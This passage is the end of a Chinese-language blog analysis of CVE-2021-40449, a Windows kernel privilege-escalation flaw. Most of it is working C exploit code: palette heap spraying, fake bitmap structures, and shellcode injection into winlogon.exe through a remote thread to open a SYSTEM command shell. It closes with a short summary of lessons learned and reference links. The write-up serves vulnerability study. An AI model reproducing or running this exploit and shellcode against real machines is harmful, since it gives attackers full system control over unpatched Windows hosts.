	// Fake BitmapHeader
	ULONG64 BitmapHeader = FakeBitmapHeader() - 1 + 0x10;
	printf("[+] FakeBitmapHeader = %p\n", BitmapHeader);

	/*
		1607:
		*(pdc+0x720) = BitmapHeader
		*(pdc+0xAD0) = RtlSetAllBits
	*/
	((PULONG64)Fake)[0xD7] = BitmapHeader;
	((PULONG64)Fake)[0x14D] = g::RtlSetAllBitsAddress;

	lPalette->palNumEntries = (WORD)palCount;
	lPalette->palVersion = 0x300;

	for(int i=0;i<0x1000;i++)
		CreatePalette(lPalette);
}

bool CheckPrivilege(HANDLE TokenHandle)
{
	BOOL isPrivilegeSet = FALSE;
	PRIVILEGE_SET		privSet;
	LUID_AND_ATTRIBUTES Privileges[1];
	LookupPrivilegeValue(NULL, "SeDebugPrivilege", &(Privileges[0].Luid));
	Privileges[0].Attributes = 0;

	privSet.PrivilegeCount = 1;
	privSet.Control = PRIVILEGE_SET_ALL_NECESSARY;
	memcpy(privSet.Privilege, Privileges, sizeof(Privileges));

	PrivilegeCheck(TokenHandle, &privSet, &isPrivilegeSet);
	return isPrivilegeSet;
}

DWORD getProcessId(const char* name)
{
	DWORD aProcesses[1024], cbNeeded, cProcesses;
	unsigned int i;

	if (!EnumProcesses(aProcesses, sizeof(aProcesses), &cbNeeded))
	{
		printf("[Error_%d] EnumProcess failed...\n",__LINE__);
		exit(0);
	}


	// Calculate how many process identifiers were returned.
	cProcesses = cbNeeded / sizeof(DWORD);

	// Print the name and process identifier for each process.
	for (i = 0; i < cProcesses; i++)
	{
		if (aProcesses[i] != 0)
		{
			DWORD processID = aProcesses[i];
			CHAR szProcessName[MAX_PATH] = "<unknown>";

			// Get a handle to the process.

			HANDLE hProcess = OpenProcess(PROCESS_QUERY_INFORMATION |
				PROCESS_VM_READ,
				FALSE, processID);

			// Get the process name.

			if (NULL != hProcess)
			{
				HMODULE hMod;
				DWORD cbNeeded;

				if (EnumProcessModules(hProcess, &hMod, sizeof(hMod),
					&cbNeeded))
				{
					GetModuleBaseNameA(hProcess, hMod, szProcessName,
						sizeof(szProcessName) / sizeof(TCHAR));
				}
			}

			// Print the process name and identifier.
			if (!lstrcmpA(szProcessName, name))
			{
				CloseHandle(hProcess);
				return (processID);
			}

			// Release the handle to the process.

			CloseHandle(hProcess);
		}
	}

	return 0;

}

void SpawnShell() {
	HANDLE hSystemProcess = INVALID_HANDLE_VALUE;
	PVOID  pLibRemote;
	HMODULE hKernel32 = GetModuleHandleA("Kernel32");
	DWORD processID;
	unsigned char shellcode[] =
		"\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50\x52\x51" \
		"\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48\x8b\x52" \
		"\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9\x48\x31\xc0" \
		"\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41\x01\xc1\xe2\xed" \
		"\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48\x01\xd0\x8b\x80\x88" \
		"\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01\xd0\x50\x8b\x48\x18\x44" \
		"\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48\xff\xc9\x41\x8b\x34\x88\x48" \
		"\x01\xd6\x4d\x31\xc9\x48\x31\xc0\xac\x41\xc1\xc9\x0d\x41\x01\xc1" \
		"\x38\xe0\x75\xf1\x4c\x03\x4c\x24\x08\x45\x39\xd1\x75\xd8\x58\x44" \
		"\x8b\x40\x24\x49\x01\xd0\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49" \
		"\x01\xd0\x41\x8b\x04\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a" \
		"\x41\x58\x41\x59\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41" \
		"\x59\x5a\x48\x8b\x12\xe9\x57\xff\xff\xff\x5d\x48\xba\x01\x00\x00" \
		"\x00\x00\x00\x00\x00\x48\x8d\x8d\x01\x01\x00\x00\x41\xba\x31\x8b" \
		"\x6f\x87\xff\xd5\xbb\xe0\x1d\x2a\x0a\x41\xba\xa6\x95\xbd\x9d\xff" \
		"\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb\x47" \
		"\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff\xd5\x63\x6d\x64\x2e\x65" \
		"\x78\x65\x00";


	if ((processID = getProcessId("winlogon.exe")) == 0)
	{
		printf("[Error_%d] Couldn't retrieve process ID...\n", __LINE__);
		return;
	}
	printf("[+] Retrieved process id: %d\n", processID);
	hSystemProcess = OpenProcess(GENERIC_ALL, false, processID);

	if (hSystemProcess == INVALID_HANDLE_VALUE || hSystemProcess == (HANDLE)0)
	{
		printf("[Error_%d] Couldn't open system process...\n", __LINE__);
		return;
	}
	printf("[+] Got a handle on a system Process: %08p\n", hSystemProcess);


	pLibRemote = VirtualAllocEx(hSystemProcess, NULL, sizeof(shellcode) * 2, MEM_COMMIT, PAGE_EXECUTE_READWRITE);

	if (!pLibRemote)
	{
		printf("[Error_%d] Virtual alloc failed !\n", __LINE__);
		return;
	}

	printf("[+] Allocation in system process succeded with address %08p\n", pLibRemote);

	if (!WriteProcessMemory(hSystemProcess, pLibRemote, shellcode, sizeof(shellcode), NULL))
	{
		printf("[Error_%d] WriteProcessMemory failed !\n", __LINE__);
		return;
	}

	HANDLE hThread = CreateRemoteThread(hSystemProcess, NULL, 0, (LPTHREAD_START_ROUTINE)pLibRemote, NULL, 0, NULL);

	printf("[+] Writing in system process succeded\n");

	if (hThread == NULL) {
		printf("[Error_%d] CreateRemoteThread failed !\n", __LINE__);
		return;
	}
	else
		printf("[+] Remote thread created !\n");
	CloseHandle(hSystemProcess);
}

int main() {
	if (Init()) {
		Hook_DrvEnablePDEV();
		g::hdc = CreateDCA(NULL, g::szPrinterName, NULL, NULL);
		if (g::hdc == 0) {
			printf("[Error_%d] CreateDCA failed !\n", __LINE__);
			exit(-1);
		}
		g::bIsTrigger = TRUE;
		ResetDCA(g::hdc, NULL);
		if (CheckPrivilege(g::hToken)) {
			SpawnShell();
		}
		else {
			printf("[Error_%d] Permission promotion failed!\n", __LINE__);
		}
	}
	system("pause");
	return 0;
}
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
429
430
431
432
433
434
435
436
437
438
439
440
441
442
443
444
445
446
447
448
449
450
451
452
453
454
455
456
457
458
459
460
461
462
463
464
465
466
467
468
469
470
471
472
473
474
475
476
477
478
479
480
481
482
483
484
485
486
487
488
489
490
491
492
493
494
495
496
497
498
499
500
501
502
503
504
505
506
507
508
509
510
511
512
513
514
515
516
517
518
519
520
521
522
523
524
525
526
527
528
529
530
531
532
533
534
535
536
537
538
539
540
541
542
543
544
545
546
547
548
549
550
551
552
553
554
555
556
557
558
559
560
561
562
563
564
565
566
567
568
569
570
571
572
573
574
575
576
577
578
579
580
581
582
583
584
585
586
587
588
589
590
591
592
593
594
595
596
597
598
599
600
601
602
603
604
605
606
607
608
609
610
611
612
613
614
615
616
617
618
619
620
621
622
623
624
625
626
627
628
629
630
631
632
633

4.2.效果

在这里插入图片描述

5.总结

从对 CVE-2021-40449的分析中，我学会了

win10下利用 $\textcolor{cornflowerblue}{ZwQuerySystemInformation}$ 和 $\textcolor{cornflowerblue}{NtSetInformationThread}$ 绕过 SMAP的方法
利用调色板进行任意内存大小的堆布局

6.参考

[1] https://bbs.pediy.com/thread-269930.htm

[2] https://www.freebuf.com/vuls/306179.html

[3] https://www.jianshu.com/p/f8a210a97860

[4] https://nvd.nist.gov/vuln/detail/CVE-2021-40449

声明：本文内容由网友自发贡献，不代表【wpsshop博客】立场，版权归原作者所有，本站不承担相应法律责任。如您发现有侵权的内容，请联系我们。转载请注明出处：https://www.wpsshop.cn/w/小小林熬夜学编程/article/detail/544478